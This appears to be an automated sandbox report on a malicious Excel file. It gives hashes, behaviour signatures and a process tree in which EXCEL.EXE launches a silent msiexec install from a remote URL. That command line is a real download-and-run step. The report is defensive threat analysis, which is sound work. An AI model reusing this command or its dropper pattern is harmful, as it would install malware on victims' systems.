Analysis
-
max time kernel
27s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
07-09-2024 21:20
Behavioral task
behavioral1
Sample
8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b.xls
Resource
win10v2004-20240802-en
General
-
Target
8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b.xls
-
Size
82KB
-
MD5
df10732c7400e5555e4f0e37fe8fbdc1
-
SHA1
4bc9edf343c7021087046021aed2eebbe1cb6ae3
-
SHA256
8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b
-
SHA512
6334acc65489fdc107a8e28063ebadcf74bb710516fa70031b4bc0e846462d77bfbdb2dcc12a0ae72cd234369e1a7d27aac12123f01e931f4194072218b78fcb
-
SSDEEP
1536:oKpb8rGYrMPelwhKmFV5xtezEsgrdgrebDG7XE8rMxLgb4JSt1mGJfFacueBkgVV:oKpb8rGYrMPelwhKmFV5xtezEsgrdgw2
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
msiexec.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2636 2884 msiexec.exe EXCEL.EXE -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 2636 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
EXCEL.EXEmsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2884 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 34 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 2636 msiexec.exe Token: SeIncreaseQuotaPrivilege 2636 msiexec.exe Token: SeRestorePrivilege 1808 msiexec.exe Token: SeTakeOwnershipPrivilege 1808 msiexec.exe Token: SeSecurityPrivilege 1808 msiexec.exe Token: SeCreateTokenPrivilege 2636 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2636 msiexec.exe Token: SeLockMemoryPrivilege 2636 msiexec.exe Token: SeIncreaseQuotaPrivilege 2636 msiexec.exe Token: SeMachineAccountPrivilege 2636 msiexec.exe Token: SeTcbPrivilege 2636 msiexec.exe Token: SeSecurityPrivilege 2636 msiexec.exe Token: SeTakeOwnershipPrivilege 2636 msiexec.exe Token: SeLoadDriverPrivilege 2636 msiexec.exe Token: SeSystemProfilePrivilege 2636 msiexec.exe Token: SeSystemtimePrivilege 2636 msiexec.exe Token: SeProfSingleProcessPrivilege 2636 msiexec.exe Token: SeIncBasePriorityPrivilege 2636 msiexec.exe Token: SeCreatePagefilePrivilege 2636 msiexec.exe Token: SeCreatePermanentPrivilege 2636 msiexec.exe Token: SeBackupPrivilege 2636 msiexec.exe Token: SeRestorePrivilege 2636 msiexec.exe Token: SeShutdownPrivilege 2636 msiexec.exe Token: SeDebugPrivilege 2636 msiexec.exe Token: SeAuditPrivilege 2636 msiexec.exe Token: SeSystemEnvironmentPrivilege 2636 msiexec.exe Token: SeChangeNotifyPrivilege 2636 msiexec.exe Token: SeRemoteShutdownPrivilege 2636 msiexec.exe Token: SeUndockPrivilege 2636 msiexec.exe Token: SeSyncAgentPrivilege 2636 msiexec.exe Token: SeEnableDelegationPrivilege 2636 msiexec.exe Token: SeManageVolumePrivilege 2636 msiexec.exe Token: SeImpersonatePrivilege 2636 msiexec.exe Token: SeCreateGlobalPrivilege 2636 msiexec.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 2884 EXCEL.EXE 2884 EXCEL.EXE 2884 EXCEL.EXE -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
EXCEL.EXEdescription pid process target process PID 2884 wrote to memory of 2636 2884 EXCEL.EXE msiexec.exe PID 2884 wrote to memory of 2636 2884 EXCEL.EXE msiexec.exe PID 2884 wrote to memory of 2636 2884 EXCEL.EXE msiexec.exe PID 2884 wrote to memory of 2636 2884 EXCEL.EXE msiexec.exe PID 2884 wrote to memory of 2636 2884 EXCEL.EXE msiexec.exe PID 2884 wrote to memory of 2636 2884 EXCEL.EXE msiexec.exe PID 2884 wrote to memory of 2636 2884 EXCEL.EXE msiexec.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\8a8bfac2428d0c951afe998ddf030d9d734bd99939f641949be6908e58e7027b.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe RESTART=1 /i http://zonaykan.com/lsadat2 /q ADRESS=TEMP2⤵
- Process spawned unexpected child process
- Use of msiexec (install) with remote resource
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1808